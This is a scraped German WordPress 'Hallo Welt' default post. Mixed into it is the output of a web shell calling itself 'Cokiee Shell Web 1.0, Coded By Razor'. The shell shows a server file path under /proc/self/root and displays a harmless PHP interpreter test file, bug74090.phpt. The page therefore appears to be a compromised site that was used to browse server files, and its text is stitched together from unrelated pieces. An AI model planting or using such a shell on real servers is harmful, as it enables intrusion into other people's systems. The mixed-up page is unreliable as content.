Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/streams/ |
Current File : //proc/self/root/usr/local/src/php72/php-7.2.12/php-7.2.12/ext/standard/tests/streams/bug74090.phpt |
--TEST-- Bug #74090 stream_get_contents maxlength>-1 returns empty string on windows --SKIPIF-- <?php if (getenv("SKIP_ONLINE_TESTS")) { die('skip: online test'); } if (getenv("SKIP_SLOW_TESTS")) { die('skip: slow test'); } ?> --FILE-- <?php $data = base64_decode("1oIBAAABAAAAAAAAB2V4YW1wbGUDb3JnAAABAAE="); $fd = stream_socket_client("udp://8.8.8.8:53", $errno, $errstr, 0, STREAM_CLIENT_CONNECT | STREAM_CLIENT_ASYNC_CONNECT); stream_set_blocking($fd, 0); stream_socket_sendto($fd,$data); sleep(1); $ret = stream_get_contents($fd,65565); var_dump(strlen($ret) > 0); stream_socket_shutdown($fd,STREAM_SHUT_RDWR); ?> ==DONE== --EXPECTF-- bool(true) ==DONE==
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare